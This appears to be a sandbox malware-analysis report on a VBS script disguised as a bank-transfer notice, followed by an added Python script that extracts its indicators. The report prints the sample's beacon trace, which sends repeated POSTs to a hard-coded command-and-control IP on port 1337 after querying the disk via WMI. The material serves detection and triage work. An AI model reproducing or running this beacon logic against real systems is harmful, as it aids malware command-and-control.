Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.7% probability |
Source: | Initial file: xx.SetRequestHeader "User-Agent", gg |
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 1337 |
Source: global traffic | TCP traffic: 192.168.2.7:49700 -> 185.244.29.74:1337 |
Source: Joe Sandbox View | ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | HTTP traffic detected:
    POST /document HTTP/1.1
    Accept: */*
    User-Agent: B81A4609
    Accept-Language: en-ch
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 185.244.29.74:1337
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD38FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74/: |
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp, transferencia realizada.vbs | String found in binary or memory: http://185.244.29.74:1337/document |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/document-E |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/document-L |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/document.L |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/document2 |
Source: wscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/documentY |
Source: wscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/documentZ |
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/document_q |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/documentfE |
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD123C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/documentp |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD38FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} |
Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} |
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} |
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Source: transferencia realizada.vbs | Initial sample: Strings found which are bigger than 50 |
Source: classification engine | Classification label: mal76.troj.evad.winVBS@1/0@0/1 |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs" |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface:
    WScript.Shell");
    IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");
    ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");
    ISWbemObjectSet._NewEnum();
    ISWbemObjectEx._01800001();
    IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");
    IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");
    IServerXMLHTTPRequest2.send();
    IHost.CreateObject("WScript.Shell");
    IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");
    ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");
    ISWbemObjectSet._NewEnum();
    ISWbemObjectEx._01800001();
    IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");
    IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");
    IServerXMLHTTPRequest2.send();
    IServerXMLHTTPRequest2.responseText();
    IHost.Sleep("31110");
    IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");
    IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");
    IServerXMLHTTPRequest2.send();
    IHost.CreateObject("WScript.Shell");
    IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");
    ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");
    ISWbemObjectSet._NewEnum();
    ISWbemObjectEx._01800001();
    IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");
    IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");
    IServerXMLHTTPRequest2.send();
    IServerXMLHTTPRequest2.responseText();
    IHost.Sleep("31110");
    IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");
    IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");
    IServerXMLHTTPRequest2.send();
    IServerXMLHTTPRequest2.responseText();
    IHost.Sleep("31110");
    IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");
    IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");
    IServerXMLHTTPRequest2.send();
    IHost.CreateObject("WScript.Shell");
    IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");
    ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");
    ISWbemObjectSet._NewEnum();
    ISWbemObjectEx._01800001();
    IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");
    IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");
    IServerXMLHTTPRequest2.send();
    IServerXMLHTTPRequest2.responseText();
    IHost.Sleep("31110");
    IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");
    IServerXMLHTTPRequ |
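The network rows, the captured POST and the AMSI call trace above all describe one beacon loop: a WMI query against Win32_LogicalDisk, then a zero-length POST to http://185.244.29.74:1337/document with a fixed User-Agent, then a 31110 ms sleep, repeated. The script below is an added example (not code from the report, from Joe Sandbox, or from the analysed VBS) that parses those three kinds of evidence into a single triage summary. The report rows and the trace excerpt are constructed from the lines shown on this page; the row layout, the list of header names used to re-split the collapsed request, the set of expected HTTP ports and the wording of the findings are my own assumptions.

```python
"""Pull beaconing indicators out of Joe Sandbox-style report rows.
Added example, not code from the report or the analysed script: the sample inputs are
constructed from the rows on this page; row layout, header list and port set are assumptions."""
import re

# Constructed rows in the report's "Source: X | detail |" layout.
REPORT_ROWS = [
    "Source: global traffic | TCP traffic: 192.168.2.7:49700 -> 185.244.29.74:1337 |",
    "Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |",
]
# The POST as the report renders it: CRLFs stripped, headers run together.
RAW_REQUEST = ("POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-ch"
               "UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:1337"
               "Content-Length: 0Connection: Keep-AliveCache-Control: no-cache")
# Two loop iterations of the AMSI trace, abbreviated; the tail is truncated as in the report.
AMSI_TRACE = (
    'IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");'
    "ISWbemServicesEx.ExecQuery(\"SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'\");"
    'IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");'
    'IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");'
    'IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");'
    'IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");'
    'IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");'
    'IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");'
    "IServerXMLHTTPRequ"
)

TCP_RE = re.compile(r"TCP traffic: (\S+):(\d+) -> (\S+):(\d+)")
NODNS_RE = re.compile(r"without corresponding DNS query: (\S+)")
CALL_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\)$")  # Interface.method(args)
ARG_RE = re.compile(r'"([^"]*)"')                 # double-quoted arguments
HEADER_NAMES = ("Accept-Language", "Accept-Encoding", "Accept", "User-Agent", "UA-CPU",
                "Host", "Content-Length", "Connection", "Cache-Control")  # assumed list
HEADER_SPLIT_RE = re.compile(r"(?=(?:%s):\s)" % "|".join(map(re.escape, HEADER_NAMES)))


def network_indicators(rows):
    """Destination endpoints seen, plus IPs contacted without a preceding DNS lookup."""
    endpoints, no_dns = set(), set()
    for row in rows:
        if m := TCP_RE.search(row):
            endpoints.add((m.group(3), int(m.group(4))))
        elif m := NODNS_RE.search(row):
            no_dns.add(m.group(1))
    return endpoints, no_dns


def parse_collapsed_request(raw):
    """Rebuild (method, path, headers) from a request whose CRLFs were stripped.
    Heuristic: a new line starts wherever a known header name followed by ': ' begins."""
    lines = HEADER_SPLIT_RE.split(raw)
    method, path = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name] = value.strip()
    return method, path, headers


def parse_amsi_trace(trace):
    """Tokenise the trace into (interface, method, args); truncated fragments are dropped."""
    calls = []
    for chunk in trace.split(";"):
        if m := CALL_RE.match(chunk.strip()):
            calls.append((m.group(1), m.group(2), ARG_RE.findall(m.group(3))))
    return calls


def beacon_profile(calls):
    """What the script does on the wire: C2 URLs, User-Agent, cadence, recon queries."""
    prof = {"c2": set(), "user_agents": set(), "sends": 0, "sleep_ms": [], "wmi_queries": set()}
    for _iface, method, args in calls:
        if method == "open" and len(args) >= 2:
            prof["c2"].add((args[0], args[1]))
        elif method == "setRequestHeader" and len(args) == 2 and args[0].lower() == "user-agent":
            prof["user_agents"].add(args[1])
        elif method == "send":
            prof["sends"] += 1
        elif method == "Sleep" and args:
            prof["sleep_ms"].append(int(args[0]))
        elif method == "ExecQuery" and args:
            prof["wmi_queries"].add(args[0])
    return prof


def triage(rows, raw_request, trace):
    """Cross-check network rows, the captured request and the AMSI trace."""
    endpoints, no_dns = network_indicators(rows)
    method, path, headers = parse_collapsed_request(raw_request)
    prof = beacon_profile(parse_amsi_trace(trace))
    findings = []
    for ip, port in sorted(endpoints):
        if ip in no_dns:
            findings.append(f"hard-coded C2 {ip}:{port}, no DNS lookup")
        if port not in (80, 443, 8080):  # assumed set of expected HTTP ports
            findings.append(f"HTTP on non-standard port {port}")
    if method == "POST" and headers.get("Content-Length") == "0":
        findings.append("empty POST body: check-in beacon, not an upload")
    if headers.get("User-Agent") in prof["user_agents"]:
        findings.append(f"static User-Agent {headers['User-Agent']} set by the script")
    if prof["sleep_ms"]:
        findings.append(f"fixed sleep {prof['sleep_ms'][0]} ms between {prof['sends']} sends")
    return {"endpoints": endpoints, "request": (method, path, headers), "profile": prof, "findings": findings}
```

Run it as `python3 triage.py` after adding `print(triage(REPORT_ROWS, RAW_REQUEST, AMSI_TRACE)["findings"])`, or paste real rows from a report into `REPORT_ROWS`. The header re-split is deliberately a fixed list rather than a generic "Capitalised-Word:" pattern, because values such as `Keep-Alive` immediately followed by the next header name would otherwise be swallowed into one token; extend `HEADER_NAMES` when a report shows headers the list does not cover.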